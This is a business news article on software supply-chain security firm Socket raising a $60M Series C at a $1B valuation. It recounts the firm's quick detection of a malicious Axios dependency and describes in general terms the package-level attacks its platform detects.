Socket Raises $60M Series C at $1B Valuation After Catching a Malicious Axios Dependency in Six Minutes
Socket has raised $60 million in a Series C funding round at a $1 billion valuation, officially crossing into unicorn territory at a moment when the software supply chain security market is receiving some of the most intense enterprise scrutiny in years. The round was led by Thrive Capital, with participation from Andreessen Horowitz, Abstract Ventures, and Capital One Ventures. Total funding since the company's founding in 2020 now stands at $125 million.
The timing of the announcement, May 20, comes weeks after one of the most widely discussed open‑source security incidents of the year, an incident that Socket played a starring role in detecting.
Six Minutes That Changed the Conversation
When a widely used JavaScript package called Axios was compromised by an attacker who injected malicious code into a dependency, the incident exposed something uncomfortable about how most organizations manage open‑source software risk. Axios is downloaded billions of times per month. It is present in the dependency trees of a significant share of web applications across the enterprise market. A poisoned version of a package at that scale can propagate into production systems across thousands of companies before any public vulnerability disclosure happens.
Socket identified the malicious Axios dependency within six minutes of it being published. The platform blocked it for its customers before it entered production systems. Within 24 hours of the incident, more than 2,000 organizations had signed up for Socket's platform.
That sequence of events is the most concise version of Socket's sales pitch. Legacy vulnerability scanning tools work by checking packages against known vulnerability databases. Those databases only contain threats that have already been publicly identified, which means there is an inherent lag between when an attacker introduces malicious code and when a scanner can detect it. In a world where AI is accelerating how code is written, tested, and deployed, that lag has become commercially unacceptable.
Thrive Capital partner Philip Clark addressed this directly in comments accompanying the round. Legacy tools were designed for an era when there was sufficient time between vulnerability introduction and breach to react to known signatures. That assumption no longer holds when AI can identify and exploit vulnerabilities faster than disclosure cycles can operate.
What Socket Actually Does
Socket was founded in 2020 by Feross Aboukhadijeh, who previously built and ran the BitTorrent streaming service WebTorrent and the npm package peerjs, both of which are used by millions of developers. His experience inside the open‑source ecosystem gave him an unusually detailed understanding of how dependency supply chains work and where the attack surface sits.
The platform analyzes the behavior of open‑source packages rather than just checking their names against a vulnerability list. That distinction matters because behavioral analysis can detect:
- Backdoors embedded in new package versions
- Typosquatting attacks where malicious packages are published with names nearly identical to legitimate ones
- Obfuscated code that executes unexpected actions when dependencies are installed
- Dependency confusion attacks that exploit how package managers resolve module names across public and private registries
- Install scripts that make unauthorized network connections or access environment variables
This kind of analysis happens in real time as packages are published to registries, not after they have already been adopted by developers. The practical result is that Socket's customers receive a block or warning before malicious code enters their codebase, rather than a notification after it already has.
The platform integrates directly into developer workflows through GitHub, GitLab, and IDE extensions, meaning the security review happens at the point where a developer adds or updates a dependency, not in a separate security team queue hours or days later.
Who Is Using It
Socket's customer list reflects the concentration of sophisticated engineering organizations that both contribute to and depend on open‑source software at scale.
Named customers include Anthropic, xAI, Replit, Cursor, Figma, Vercel, Gusto, Mercado Libre, and Cribl, alongside Fortune 100 companies in financial services and global media. That roster covers the organizations building the AI tools developers use (Anthropic, xAI), the platforms developers build on (Vercel, Replit), and the tools developers use every day (Figma, Cursor). These are not peripheral adopters of open‑source software. They are organizations whose products are substantially built from it.
Notably, Socket was named to the Rising in Cyber 2026 list, a recognition selected by CISOs and senior security executives identifying the 30 most significant private cybersecurity startups operating today. That peer‑level endorsement from the buyer community is a different signal than investor backing, and in enterprise security, it carries meaningful weight in procurement conversations.
The Market Behind the Round
The software supply chain attack surface has expanded significantly over the past three years in direct proportion to the growth of AI‑assisted development. AI coding tools help engineers ship code faster, and a large portion of that code relies on open‑source packages pulled from external registries. More packages, more frequent updates, faster deployment cycles, and more developers working with AI assistance means the volume of unvetted external code entering enterprise production environments has grown substantially.
Socket competes in this space against Snyk, Checkmarx, Sonatype, and GitHub's own security scanning tools, all of which have existing enterprise relationships and significant capital behind them. Socket's argument is not that those tools are bad. It is that they were architecturally designed for a threat model that predates the current reality, where attackers are targeting the publication of new packages rather than exploiting known vulnerabilities in existing ones.
The $60 million Series C will support the company's next phase of growth as enterprise adoption accelerates across financial services, technology, and media organizations managing complex open‑source dependency graphs. The company has not disclosed revenue figures, but the customer list and the lender quality of the investor group suggest the commercial traction is substantial.
